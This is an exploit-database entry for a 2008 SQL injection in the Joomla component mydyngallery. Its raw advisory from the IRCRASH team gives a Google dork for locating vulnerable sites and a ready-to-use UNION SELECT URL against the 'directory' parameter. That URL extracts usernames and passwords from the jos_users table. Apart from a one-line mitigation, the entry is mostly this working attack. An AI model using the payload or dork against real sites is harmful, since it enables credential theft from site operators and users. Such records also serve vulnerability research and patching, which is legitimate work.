Joomla Component mydyngallery exploit

vendor:

mydyngallery

by:

Sina Yazdanmehr (R3d.W0rm)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: mydyngallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component mydyngallery exploit

A SQL injection vulnerability exists in the Joomla Component mydyngallery, which allows an attacker to execute arbitrary SQL commands via the 'directory' parameter in a index.php?option=com_mydyngallery request. The attacker can use the 'union' keyword to append the results of a second query to the results of the first query, and can use the 'concat' keyword to concatenate strings together.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####                      Joomla Component mydyngallery                          ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#####################################################################################
#                                                                                   #
#Download : http://mydyngallery.mon-cottenchy.fr                                    #
#                                                                                   #
#DORK : inurl:option=com_mydyngallery                                               #
#                                                                                   #
#####################################################################################
#                                       [Bug]                                       #
#                                                                                   #
#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-12-04]